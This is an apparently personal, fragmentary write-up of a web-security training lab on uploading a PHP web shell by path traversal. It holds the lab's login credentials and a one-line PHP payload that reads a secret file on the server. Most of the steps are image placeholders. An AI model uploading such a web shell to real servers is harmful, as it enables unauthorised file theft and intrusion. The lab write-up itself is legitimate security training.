03 Lab: Web shell upload via path traversal

Objetivo

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

SoluciĆ³n

  1. Exploramos el inicio de sesiĆ³n y nos permite subir imagen

image.png
image.png

https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png

https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png

image.png

  1. <?php echo file_get_contents('/home/carlos/secret'); ?>

image.png
image.png

The server is configured to prevent execution of user-supplied files

image.png
image.png

Esto era el secrets:

image.png

Observamos el Admin=False

image.png
Previous02 Lab Web shell upload via path traversal 17efab5460ec801980d1fa9a1e9e0b67Next28 NoSQL Injection

Last updated